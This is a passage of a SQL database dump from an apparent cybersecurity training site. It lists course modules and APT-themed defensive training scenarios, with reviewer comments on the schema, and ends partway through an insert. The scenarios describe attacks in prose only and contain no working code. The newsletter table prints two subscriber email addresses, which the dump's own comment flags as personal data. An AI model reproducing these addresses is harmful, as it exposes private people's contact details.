(9, 1, 'Windows Fundamentals', 'Master Windows OS, Active Directory basics, and PowerShell for security operations.', 16, 3, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 03:05:08'),
(10, 1, 'Security Principles', 'Core security concepts: CIA Triad, AAA, encryption, defense in depth.', 14, 5, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 03:05:08'),
(11, 1, 'Windows Command Line', 'Master essential Windows commands: Navigation, Files, Networking, and Processes.', 5, 6, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12'),
(12, 2, 'Log Analysis Fundamentals', 'Master the art of reading logs, from basic authentication to advanced attack detection.', 8, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58'),
(14, 2, 'Web Proxies Fundamentals', 'Understand how proxies work, how to intercept traffic, and the basics of Burp Suite.', 5, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42'),
(15, 2, 'Introduction to IDS/IPS', 'Comprehensive guide to Intrusion Detection and Prevention Systems.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:20'),
(16, 2, 'Vulnerability Scanning', 'Master the Vulnerability Management Lifecycle.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21'),
(17, 2, 'Web App Scanning (DAST)', 'Dynamic Application Security Testing deep dive.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21'),
(18, 2, 'Introduction to OSINT', 'Master Open Source Intelligence gathering techniques and tools.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:25:25'),
(19, 2, 'Phishing & Email Analysis', 'Learn to dissect email headers and investigate phishing attacks.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:25:25'),
(20, 2, 'Social Engineering Defense', 'Understand the human element of security and how to defend against manipulation.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:28:54'),
(21, 2, 'Virtualization & Lab Setup', 'Build your own safe hacking laboratory using Virtual Machines.', 15, 0, NULL, 1, '2025-12-26 02:44:43', '2025-12-26 22:32:26'),
(22, 3, 'SIEM Fundamentals', 'Master the \"Brain\" of the SOC: Security Information and Event Management.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:35:58'),
(23, 3, 'SIEM Use Cases', 'Practical log analysis scenarios ranging from Easy to Data Exfiltration.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:41:26'),
(24, 3, 'EDR Concepts', 'Master Endpoint Detection & Response: Telemetry, Process Trees, and Threat Hunting.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:47:08'),
(25, 3, 'Intrusion Detection', 'Learn to identify and investigate network and host-based intrusions.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:50:58'),
(26, 3, 'Malware Analysis Basics', 'Learn to safely analyze malware: Static, Dynamic, and Behavioral techniques.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-26 22:55:56'),
(27, 3, 'Incident Response Framework', 'Master the structured approach to handling security incidents.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(28, 3, 'Digital Forensics Intro', 'Learn the fundamentals of collecting and analyzing digital evidence.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(29, 3, 'Network Traffic Analysis', 'Learn to capture and analyze network packets for threat detection.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(30, 3, 'Threat Hunting Basics', 'Proactively search for threats before they cause damage.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(31, 3, 'MITRE ATT&CK Framework', 'Understand the knowledge base of adversary tactics and techniques.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(32, 3, 'Cloud Security Basics', 'Understand security challenges and controls in cloud environments.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(33, 3, 'Security Automation', 'Learn to automate security tasks using SOAR and scripting.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(34, 3, 'Reporting & Documentation', 'Master the art of documenting investigations and writing reports.', 15, 0, NULL, 1, '2025-12-26 02:45:46', '2025-12-27 02:12:47'),
(36, 4, 'Advanced SIEM', 'Deep dive into SIEM engineering: Query optimization, custom parsers, and correlation logic.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:16:31'),
(37, 4, 'Memory Forensics', 'Analyze volatile memory to uncover malware, rootkits, and attacker artifacts.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:18:03'),
(38, 4, 'Malware Reverse Engineering', 'Disassemble and analyze malicious code to understand its behavior.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:19:34'),
(39, 4, 'Advanced Threat Intelligence', 'Operationalize threat intel: Collection, analysis, dissemination, and integration.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:21:00'),
(40, 4, 'Red vs Blue Team Dynamics', 'Purple teaming: Collaboration between offensive and defensive security.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:22:23'),
(41, 4, 'Purple Teaming Exercises', 'Hands-on exercises combining offensive execution with defensive detection.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:26:00'),
(42, 4, 'Container Security', 'Secure Docker, Kubernetes, and container orchestration environments.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:27:22'),
(43, 4, 'Zero Trust Architecture', 'Never trust, always verify: Implementing zero trust principles.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:28:42'),
(44, 4, 'Compliance & Frameworks', 'Navigate security compliance: NIST, ISO, SOC 2, PCI-DSS, and HIPAA.', 15, 0, NULL, 1, '2025-12-26 02:45:47', '2025-12-27 02:30:07'),
(49, 9, 'EDR Investigations', 'Learn about EDR Investigations', 0, 1, NULL, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'),
(51, 9, 'SIEM Log Analysis', 'Learn about SIEM Log Analysis', 0, 3, NULL, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'),
(52, 9, 'Email Security & Phishing', 'Learn about Email Security & Phishing', 0, 4, NULL, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31'),
(53, 9, 'Vulnerability Management', 'Learn about Vulnerability Management', 0, 5, NULL, 1, '2025-12-26 17:59:31', '2025-12-26 17:59:31'),
(117, 6, 'CTI Fundamentals', 'Foundations of Cyber Threat Intelligence: The Intelligence Cycle, Types of Intel, and Pyramid of Value.', 3, 1, NULL, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44'),
(118, 6, 'OSINT Techniques', 'Open Source Intelligence: Gathering data from public sources using passive reconnaissance.', 4, 2, NULL, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(119, 6, 'Malware Analysis', 'Understand malware behavior, static vs dynamic analysis, and sandboxing.', 4, 3, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(120, 6, 'Indicators & Standards', 'IOCs, IOAs, TLP, and STIX/TAXII standards.', 3, 4, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(121, 6, 'MITRE ATT&CK', 'Master the framework.', 4, 5, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(122, 6, 'Threat Hunting', 'Proactive search for threats. Stacking, Clustering, and Hypothesis driven hunting.', 4, 6, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(123, 6, 'Intelligence Platforms', 'Using MISP and OpenCTI.', 5, 7, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(124, 6, 'Reporting & Dissemination', 'Writing effective reports for different audiences.', 2, 8, NULL, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(125, 11, 'Module 1: Introduction to DFIR', 'Understand the core concepts of Digital Forensics and the Incident Response lifecycle.', 0, 1, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(126, 11, 'Module 2: Evidence Acquisition & Handling', 'Learn how to properly secure, collect, and preserve digital evidence without destroying it.', 0, 2, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(127, 11, 'Module 3: Windows Forensics', 'Dive deep into the Windows Operating System to uncover attacker activity using the Registry, Event Logs, and system artifacts.', 0, 3, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(128, 11, 'Module 4: Memory Forensics (Volatility)', 'Learn how to extract hidden malware, running processes, and network connections from a captured RAM image.', 0, 4, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(129, 11, 'Module 5: Network Forensics (PCAP Analysis)', 'Learn how to analyze packet captures (PCAPs) using Wireshark and Tshark to trace attacker movements and extract stolen data.', 0, 5, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(130, 11, 'Module 6: Incident Response Methodology (PICERL)', 'Learn the standard active response framework used by defense teams to combat live attackers on the network.', 0, 6, NULL, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(131, 12, 'Module 1: TCP/IP & Protocols', 'Understand how computers communicate globally. Learn the OSI model, TCP/IP suite, and fundamental networking concepts.', 0, 1, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(132, 12, 'Module 2: Traffic Analysis (Wireshark)', 'Learn how to use Wireshark to inspect packets, filter traffic, and reconstruct network events.', 0, 2, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(133, 12, 'Module 3: Network Attacks (Spoofing, MITM)', 'Understand how attackers exploit network protocols to intercept data, redirect traffic, and disrupt services.', 0, 3, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(134, 12, 'Module 4: Firewalls & IDS/IPS', 'Learn how to defend networks using Firewalls, Intrusion Detection Systems, and Intrusion Prevention Systems.', 0, 4, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55');

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_subscribers`
--

-- Newsletter sign-ups. `email` is personal data, so any dump carrying this
-- table's rows has to be handled as production data.
-- NOTE(review): MyISAM/latin1 here while `modules` uses InnoDB/utf8mb4. MyISAM
-- is non-transactional (a transaction wrapped around a restore does not cover
-- these rows) and cannot carry FOREIGN KEYs; latin1 cannot store non-Latin
-- characters. Nothing in this statement makes `email` unique, so duplicate
-- sign-ups are not rejected by the database unless a later key adds that.
CREATE TABLE newsletter_subscribers (
    id            INT(11)      NOT NULL,
    email         VARCHAR(255) NOT NULL,
    subscribed_at DATETIME     DEFAULT CURRENT_TIMESTAMP,
    -- presumably cleared on unsubscribe rather than deleting the row — confirm
    is_active     TINYINT(1)   DEFAULT 1
) ENGINE = MyISAM
  DEFAULT CHARACTER SET = latin1
  COLLATE = latin1_swedish_ci;

--
-- Dumping data for table `newsletter_subscribers`
--

-- NOTE(review): these rows are subscriber e-mail addresses (personal data).
-- Exclude or redact this table's data before the dump is shared, committed to
-- a repository, or reused as a development fixture.
INSERT INTO `newsletter_subscribers` (`id`, `email`, `subscribed_at`, `is_active`) VALUES
(1, 'fdmtsknsy@gmail.com', '2026-01-22 02:42:12', 1),
(2, 'derrickngugi130@gmail.com', '2026-03-14 00:51:52', 1);

-- --------------------------------------------------------

--
-- Table structure for table `notifications`
--

-- Per-user notification feed.
-- NOTE(review): MyISAM/latin1 while `modules` uses InnoDB/utf8mb4. MyISAM is
-- non-transactional and cannot hold a FOREIGN KEY from user_id to the users
-- table; latin1 cannot store non-Latin text in `message`. Aligning this table
-- with the InnoDB/utf8mb4 tables would remove both limitations.
CREATE TABLE notifications (
    id         INT(11)    NOT NULL,
    -- No index on user_id is declared in this statement.
    user_id    INT(11)    NOT NULL,
    message    TEXT,
    is_read    TINYINT(1) DEFAULT 0,
    created_at TIMESTAMP  NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE = MyISAM
  DEFAULT CHARACTER SET = latin1
  COLLATE = latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `operations`
--

-- Training operations: multi-alert scenarios attributed to a named threat group.
-- This statement carries no ENGINE/CHARSET clause and no keys; in this dump
-- style indexes and constraints arrive in later ALTER TABLE statements outside
-- this block, so nothing here guarantees id or slug is unique.
CREATE TABLE operations (
    id               INT(11)      NOT NULL,
    title            VARCHAR(255) NOT NULL,
    -- Free text; one dumped row carries a trailing space ('APT1 '), so trim on write.
    apt_group        VARCHAR(255),
    description      TEXT,
    story_intro      TEXT,
    -- Free text; the dumped rows mix 'intermediate' with 'Intermediate'.
    -- A CHECK constraint or lookup table would keep the casing consistent.
    difficulty_level VARCHAR(50),
    display_order    INT(11)      DEFAULT 0,
    is_active        TINYINT(1)   DEFAULT 1,
    is_premium       TINYINT(1)   DEFAULT 0,
    -- presumably a percentage threshold — confirm against the grading code
    passing_grade    INT(11)      DEFAULT 60,
    time_limit_hours INT(11),
    -- utf8mb4_bin LONGTEXT is the storage form MariaDB uses for its JSON alias,
    -- so this is most likely a JSON column. The dumped rows show the value
    -- JSON-encoded several times over (nested \" layers) instead of a plain
    -- array such as '[]'; the writer appears to re-encode an already-encoded
    -- string and should be fixed at the application layer.
    tags             LONGTEXT CHARACTER SET utf8mb4 COLLATE utf8mb4_bin,
    scenario_prompt  TEXT,
    total_alerts     INT(11)      DEFAULT 0,
    created_at       TIMESTAMP    NOT NULL DEFAULT CURRENT_TIMESTAMP,
    seo_title        VARCHAR(255),
    seo_description  TEXT,
    -- Dumped values are kebab-cased titles; uniqueness is not enforced here.
    slug             VARCHAR(255),
    min_level        INT(11)      DEFAULT 1
);

--
-- Dumping data for table `operations`
--

INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(1, 'Operation Iron Grid', 'Sandworm (Russian GRU)', 'Investigate a massive power outage affecting critical infrastructure. Use OT/ICS forensics to track the attacker\'s pivot from the corporate IT network into the SCADA control systems using BlackEnergy malware variants.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 5, '2025-12-31 13:08:59', NULL, NULL, 'operation-iron-grid', 1),
(2, 'Operation Silent Tsunami', 'Lazarus Group (North Korea)', 'A major decentralized finance (DeFi) platform has been drained of $600M. Trace the laundered cryptocurrency through mixer services and analyze the social engineering campaign that targeted developers with weaponized job offers.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 4, '2025-12-31 13:42:03', NULL, NULL, 'operation-silent-tsunami', 1),
(3, 'Operation Glass Serpent', 'APT41 (Barium)', 'A distinct supply chain attack compromising a popular server management software. Identify the malicious DLL injection in the signed update package and track the actor\'s dual-mission of espionage and financial theft across victim networks.\n', '', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 4, '2025-12-31 13:44:55', 'Operation Glass Serpent', 'A distinct supply chain attack compromising a popular server management software. Identify the malicious DLL injection in the signed update package and track the actor\'s dual-mission of espionage and financial theft across victim networks.\n', 'operation-glass-serpent', 1),
(4, 'Operation Phantom Ballot', 'APT28 (Fancy Bear)', 'Uncover a disinformation and spear-phishing campaign targeting political organizations ahead of a national election. Analyze leaked documents, track domain infrastructure used for credential harvesting, and identify the OAuth token abuse techniques.\n', '', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"[]\\\\\\\\\\\\\\\"\\\\\\\"\\\"\"', '', 4, '2025-12-31 15:16:16', 'Operation Phantom Ballot', 'Uncover a disinformation and spear-phishing campaign targeting political organizations ahead of a national election. Analyze leaked documents, track domain infrastructure used for credential harvesting, and identify the OAuth token abuse techniques.\n', 'operation-phantom-ballot', 1),
(5, 'Operation Black Harvest', 'Wizard Spider (Ryuk/Conti)', 'Respond to a catastrophic ransomware attack paralyzing a regional hospital network. Recover patient data from shadow copies, identify the initial access broker\'s entry point via TrickBot, and trace the lateral movement using Cobalt Strike beacons.', '', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 5, '2025-12-31 15:21:18', 'Operation Black Harvest', 'Respond to a catastrophic ransomware attack paralyzing a regional hospital network. Recover patient data from shadow copies, identify the initial access broker\'s entry point via TrickBot, and trace the lateral movement using Cobalt Strike beacons.', 'operation-black-harvest', 1),
(6, 'Operation Golden Ticket', 'Carbanak / FIN7', 'A global banking heist involving the manipulation of ATM withdrawal limits and SWIFT transaction gateways. Analyze the specialized administrative tools used by the attackers to impersonate bank clerks and authorize fraudulent transfers.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 4, '2025-12-31 15:22:51', 'Operation Golden Ticket', 'A global banking heist involving the manipulation of ATM withdrawal limits and SWIFT transaction gateways. Analyze the specialized administrative tools used by the attackers to impersonate bank clerks and authorize fraudulent transfers.\n', 'operation-golden-ticket', 1),
(7, 'Operation Desert Mirage', 'APT34 (OilRig)', 'A simulated cyber operation led by the APT34 group aimed at infiltrating a multinational energy corporation to exfiltrate sensitive geological data.', 'In this scenario, participants will defend against a targeted cyber attack by APT34, also known as OilRig. The group is known for its focus on the energy sector, and they are suspected to be backed by a nation-state. The exercise will challenge participants to identify and mitigate threats across multiple stages of an advanced persistent threat operation.', 'intermediate', 0, 1, 1, 60, NULL, '[]', '', 5, '2026-01-02 04:27:59', NULL, NULL, 'operation-desert-mirage', 1),
(8, 'Operation Silent Harvest', 'APT10 (Stone Panda)', 'This training scenario simulates a cyber attack by APT10 (Stone Panda), known for its sophisticated cyber espionage campaigns. Participants will navigate through a series of alerts representing different stages of an attack, aiming to understand and mitigate each threat effectively.', 'In recent months, there has been an increase in suspicious activities targeting a fictional multinational corporation, TechGlobal Inc. Intelligence suggests that APT10 is behind these attacks, with the intent to exfiltrate sensitive intellectual property and confidential business data. Your task is to identify and neutralize the threats as they unfold.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 5, '2026-01-02 20:23:41', NULL, NULL, 'operation-silent-harvest', 1),
(9, 'Operation Infinite Loop', 'Equation Group / Lamberts', 'Analyze a sophisticated firmware implant discovered on enterprise firewalls. This advanced persistent threat persists across reboots and OS re-installations. Conduct low-level forensic analysis of the SPI flash memory to extract the payload.', '', 'advanced', 0, 1, 1, 60, NULL, '[]', NULL, 10, '2026-01-02 20:26:53', NULL, NULL, 'operation-infinite-loop', 1),
(10, 'Operation Ocean Lotus', 'APT32 (OceanLotus)', 'A targeted watering hole attack on a human rights organization\'s website. Users are infected with a custom backdoor upon visiting the site. Analyze the obfuscated JavaScript payload and the subsequent macOS malware deployment.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"[]\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\"\\\"\"', '', 5, '2026-01-02 20:30:06', 'Operation Ocean Lotus', 'A targeted watering hole attack on a human rights organization\'s website. Users are infected with a custom backdoor upon visiting the site. Analyze the obfuscated JavaScript payload and the subsequent macOS malware deployment.\n', 'operation-ocean-lotus', 1),
(11, 'Operation Radiant Horizon', 'Hafnium (China)', 'Train in identifying and mitigating Hafnium\'s exploitation of Exchange servers using ProxyLogon and China Chopper.', 'In early 2021, organizations worldwide faced a sophisticated onslaught by Hafnium, a Chinese state-sponsored APT group. This scenario puts you in the shoes of a cyber defense team responding to a mass exploitation event targeting on-premise Exchange servers. Your mission: analyze web shell artifacts, uncover the chain of zero-day vulnerabilities used for initial access, and determine the scope of data exfiltration. This advanced training will test your skills in real-world threat detection and incident response.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Hafnium\\\\\\\",\\\\\\\"ProxyLogon\\\\\\\",\\\\\\\"China Chopper\\\\\\\",\\\\\\\"Exchange Server Exploitation\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\"]\\\"\"', '', 8, '2026-01-03 00:02:24', 'Advanced Response to Hafnium\'s Mass Exploitation of Exchange Servers', 'Train in identifying and mitigating Hafnium\'s exploitation of Exchange servers using ProxyLogon and China Chopper.', 'operation-radiant-horizon', 1),
(12, 'Operation Silent Star', 'Turla (Snake / Uroburos)', 'Investigate Turla\'s hijacking of satellite links to mask C2 locations using rootkits on diplomatic networks.', 'In a world where digital espionage knows no bounds, the notorious Turla group has taken cyber warfare to new heights. By hijacking commercial satellite internet links, they\'ve crafted an insidious method to conceal their command and control locations. As a cyber threat analyst, your mission is to dismantle this operation by tracing the hijacked downstream traffic and unearthing the sophisticated rootkit deployed within diplomatic networks. Can you unravel the layers of deception and thwart Turla\'s ambitions?', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Turla APT\\\\\\\",\\\\\\\"cyber espionage\\\\\\\",\\\\\\\"satellite hijacking\\\\\\\",\\\\\\\"network security\\\\\\\",\\\\\\\"rootkit analysis\\\\\\\"]\\\"\"', '', 5, '2026-01-03 00:36:50', 'Operation Satellite Serpent: Uncovering Turla\'s Covert Channels', 'Investigate Turla\'s hijacking of satellite links to mask C2 locations using rootkits on diplomatic networks.', 'operation-silent-star', 1),
(13, 'Operation Dragon Breath', 'APT40 (Periscope)', 'Uncover APT40\'s tactics in stealing maritime research data via compromised servers and custom malware.', 'In an unprecedented cyber breach, APT40 has targeted a naval engineering university, stealing sensitive maritime research data. Analysts must uncover how compromised web servers were used as relay points and analyze the custom malware deployed to exfiltrate proprietary sonar technology schematics. This operation requires a keen understanding of APT40\'s tactics and technical prowess to unravel their sophisticated attack chain.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT40\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"maritime data breach\\\\\\\",\\\\\\\"custom malware\\\\\\\",\\\\\\\"threat analysis\\\\\\\"]\\\"\"', '', 5, '2026-01-03 00:41:42', 'Investigating APT40\'s Maritime Data Heist', 'Uncover APT40\'s tactics in stealing maritime research data via compromised servers and custom malware.', 'operation-dragon-breath', 1),
(14, 'Operation Wasted Locker', 'Evil Corp (Indrik Spider)', 'Engage in simulated ransomware negotiation and decryption against Evil Corp in this advanced cybersecurity training scenario.', 'In a high-stakes cybersecurity operation, a Fortune 500 company falls victim to a sophisticated ransomware attack by the notorious APT group, Evil Corp. As the company\'s data is held hostage, your team is tasked with negotiating with the attackers while simultaneously reverse-engineering the malware to identify a vulnerability in its encryption. The initial infection vector is traced back to a cunning drive-by download, demonstrating Evil Corp\'s technical prowess. Can you outsmart the attackers, recover the data, and trace the attack back to its source?', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Evil Corp\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"malware analysis\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 7, '2026-01-03 00:49:14', 'Evil Corp Ransomware Negotiation and Decryption Challenge', 'Engage in simulated ransomware negotiation and decryption against Evil Corp in this advanced cybersecurity training scenario.', 'operation-wasted-locker', 1),
(15, 'Operation Soft Cell', 'Gallium (Soft Cell)', 'Beginner-level scenario to detect and remediate Gallium APT\'s long-term intrusion in telecoms capturing call records.', 'In this training scenario, participants will dive into the covert world of cyber espionage as they work to uncover and disrupt Gallium APT\'s intrusion into global telecommunications networks. The attackers are meticulously capturing Call Detail Records of high-value targets, using stealthy web shells and \'living off the land\' tactics to remain undetected. Trainees will learn to identify these threats and employ effective remediation strategies.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Gallium APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"telecommunications security\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"web shell detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cyber threat intelligence\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"call detail record\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-03 00:53:35', 'Gallium APT: Telecom Intrusion Detection Training', 'Beginner-level scenario to detect and remediate Gallium APT\'s long-term intrusion in telecoms capturing call records.', 'operation-soft-cell', 1),
(16, 'Operation Rabid Dog', 'MuddyWater (Static Kitten)', 'Uncover and mitigate MuddyWater\'s destructive wiper attack disguised as ransomware against a government agency.', 'In the heart of a bustling government agency, a seemingly routine email arrives, carrying a sinister payload. The notorious APT group MuddyWater, known for their cunning tactics, has launched a deceptive wiper attack, masquerading as ransomware. The operation requires the team to dissect the macro-enabled document that serves as the initial vector, analyze the embedded \'POWERSTATS\' backdoor, and extract critical forensic artifacts before the destructive wiping logic can execute. The race against the clock is on, as every second counts in preventing irreversible damage.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"MuddyWater\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"wiper attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 10, '2026-01-03 23:50:48', 'MuddyWater\'s Deceptive Wiper Attack on Government Infrastructure', 'Uncover and mitigate MuddyWater\'s destructive wiper attack disguised as ransomware against a government agency.', 'operation-rabid-dog', 1),
(17, 'Operation Horizon', 'APT1 ', 'Engage in a beginner-friendly cyber operation simulation featuring APT1\'s well-known tactics and techniques.', 'In this training scenario, participants will dive into a simulated cyber espionage operation orchestrated by the notorious APT1 group. Known for its sophisticated attacks and persistence, APT1 has launched a new campaign targeting a fictional global manufacturing company. Trainees will navigate through realistic alerts to identify and mitigate threats, gaining insights into APT1\'s tactics, techniques, and procedures (TTPs) as they progress through the attack lifecycle.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT1 operation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"beginner cyber scenario\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"threat intelligence\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cyber espionage\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 00:58:38', 'APT1 Cyber Espionage Scenario: Beginner\'s Threat Simulation', 'Engage in a beginner-friendly cyber operation simulation featuring APT1\'s well-known tactics and techniques.', 'operation-horizon', 1),
(18, 'Operation Gothic Panda', 'APT3 (Gothic Panda)', 'Train to counter APT3\'s sophisticated cyberattack, simulating their known TTPs in a realistic, intermediate-level scenario.', 'In this scenario, your organization is targeted by APT3, also known as Gothic Panda, a notorious cyber espionage group. Known for their sophisticated techniques and extensive resource access, APT3 has set its sights on exfiltrating your company\'s sensitive data. Your mission is to navigate through a series of alerts, utilizing threat intelligence and defensive strategies to thwart their multi-stage infiltration attempt.', 'Intermediate', 0, 1, 1, 60, NULL, '\"[]\"', '', 5, '2026-01-04 02:06:57', 'Defend Against Gothic Panda\'s Multi-Stage Infiltration', 'Train to counter APT3\'s sophisticated cyberattack, simulating their known TTPs in a realistic, intermediate-level scenario.', 'operation-gothic-panda', 1),
(19, 'Operation Red Apollo', 'APT10 (MenuPass)', 'Explore APT10\'s DLL side-loading techniques in a complex aerospace sector espionage campaign.', 'In the ever-evolving landscape of cyber threats, APT10, also known as MenuPass, has launched a sophisticated espionage campaign targeting the aerospace industry. Leveraging DLL side-loading techniques, the threat actors aim to infiltrate, persist, and exfiltrate critical intellectual property, including large CAD files, to gain a competitive edge in aerospace technology.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"APT10\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DLL Side-Loading\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Aerospace Espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Intellectual Property Theft\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 7, '2026-01-04 02:13:24', 'APT10\'s Aerospace Espionage - DLL Side-Loading Tactics', 'Explore APT10\'s DLL side-loading techniques in a complex aerospace sector espionage campaign.', 'operation-red-apollo', 1),
